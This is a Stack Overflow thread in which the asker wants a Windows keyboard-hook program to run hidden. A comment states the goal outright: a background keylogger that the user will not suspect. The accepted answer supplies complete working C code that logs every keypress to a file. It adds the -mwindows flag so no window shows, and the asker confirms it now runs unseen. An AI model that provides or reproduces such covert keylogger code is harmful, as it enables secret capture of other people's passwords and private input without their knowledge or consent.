# Making console window invisible ruins the program

Tags: windows, console

I am hooking the keys and writing them down to a file, everything works fine but when I make the console window hidden, I can not hook the keys and print to a file, how to get rid of this problem? Down below when I removed `ShowWindow()` function I am able to hook the keys but otherwise I am not. I see the process is still running on task manager by the way.

See my example code here:

```
KBDLLHOOKSTRUCT kbdSTRUCT;

int APIENTRY WinMain(HINSTANCE hinstance, HINSTANCE hprevious, LPSTR cmdline, int cmdshow ) {

  HWND wnd;
  wnd = GetConsoleWindow();
  ShowWindow(wnd, FALSE);

  HHOOK kbdHOOK;
  kbdHOOK = SetWindowsHookEx(WH_KEYBOARD_LL, kbdProc, NULL, 0);

  MSG msgg;
  while(GetMessage(&msgg, NULL, 0, 0) > 0){
    TranslateMessage(&msgg);
    DispatchMessage(&msgg);
  }

}
LRESULT CALLBACK kbdProc(int nCode, WPARAM wPar, LPARAM lPar){
  if(nCode >= 0){
    if(wPar == 256){
      kbdSTRUCT = *(KBDLLHOOKSTRUCT *)lPar;

      if(kbdSTRUCT.vkCode == 0x90){
        //fprintf function here to write to a file
        return CallNextHookEx(NULL, nCode, wPar, lPar);
      }

    }
  }
}
```

Thank you so much

Comment: Why do you need a fake console window? Just remove the lines relating to console window.

Comment: Ido not need a fake console window @BarmakShemirani have you not read the question? I am trying remove the console window by making t invisible by setwindowshookex loses its ability when i do that

Comment: There is no console window. `WinMain` doesn't create a console window. `GetConsoleWindow` will return `NULL` the way you have written the program. What compiler are you using?

Comment: it doesn't seem to be different, I made it  a simple main app, `GetConsoleWindow()` does not return `NULL` but when I use `ShowWindow()` to make the console invisible, which works as expected, the hook loses its ability and I can't print my keys to the file. But the process is still up and running on the task manager. @BarmakShemirani

Comment: also the process is inside *Background Process* on task manager since the window is hidden. Maybe `SetWindowsHookEx()` should have a valid window to hook keys? I don't know.. But what's the way around it?

Comment: My question is about `WinMain`. There is no console when you create a window program with `WinMain`. If you create a program with `main` then there is a console window. What IDE are you using? Is it Visual Studio? Codeblock? etc.?

Comment: I am using atom ide and I am compiling my program manually on command prompt. I use gcc. so the format is `gcc myfile.c -o myfile.exe` @BarmakShemirani basically what I am trying to do is make a keylogger but in a background, I don't want the console window to be visible so the user does not suspect anything. This is only educational. But this is what happens when I make the Console window hidden

Comment: I see what's going on. You need MinGW in addition to gcc for a proper Windows program. Or use Visual Studio. I strongly recommend Visual Studio. It's free! I am amazed that your code works at all. A proper Windows program with `WinMain` will not show a console window. You have a number of other errors in your code. See if you can get MinGW or Visual Studio going.

Comment: Let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/157058/discussion-between-turmuka-and-barmak-shemirani).

Comment: it did not seem to work @BarmakShemirani but maybe my configurations are wrong. I know it is interesting, but I don't know if it'd make a difference when I use an IDE like that.

Comment: I guess you already had MinGW otherwise it wouldn't find windows file headers. Add `-mwindows` option

Answer (score 1, accepted):

When using gcc, `-mwindows` will set the Windows subsystem, this way no console window will appear when entry point is `WinMain`

```
gcc myfile.c -mwindows -o myfile.exe
```

Use a global variable to store `SetWindowsHookEx` result and pass it `kbdProc`, use that in `CallNextHookEx`

```
#include <Windows.h>
#include <stdio.h>

HHOOK hhook = NULL;
LRESULT CALLBACK kbdProc(int nCode, WPARAM wPar, LPARAM lPar)
{
    if(nCode >= 0) {
        if(wPar == WM_KEYDOWN) { //or WM_KEYUP!
            KBDLLHOOKSTRUCT *kb = (KBDLLHOOKSTRUCT*)lPar;
            int c = kb->vkCode;
            FILE *file = fopen("test", "a");
            switch(c) {
            case VK_NUMLOCK: fprintf(file, "VK_NUMLOCK\n"); break;
            case VK_RETURN: fprintf(file, "\n"); break;
            default: fprintf(file, "%c", c); break;
            }
            fclose(file);
        }
    }
    return CallNextHookEx(hhook, nCode, wPar, lPar);
}

int APIENTRY WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR cmdline, int show) 
{
    hhook = SetWindowsHookEx(WH_KEYBOARD_LL, kbdProc, NULL, 0);
    MSG msg;
    while(GetMessage(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UnhookWindowsHookEx(hhook);
    return 0;
}
```

Make sure to use the correct windows constants. For example `ShowWindow(wnd, SW_HIDE)` instead of `ShowWindow(wnd, FALSE)`. `WM_KEYUP` instead of `256`. Otherwise the code will be too confusing when you look at the next day. Other people will not understand it.

You need to examine the shift key in addition to `VK_NUMLOCK` to find upper/lower case letters ...

Comment: it worked! Adding `-mwindows` to arguments while compiling and changing the params of `SetWindowsHookEx()` made the program run as I have wanted. And I don't need any IDEs all i needed was `-mwindows` command.

Comment: I've also changed the main function to `APIENTRY`. Thanks. This is really interesting. It can run as a background process now.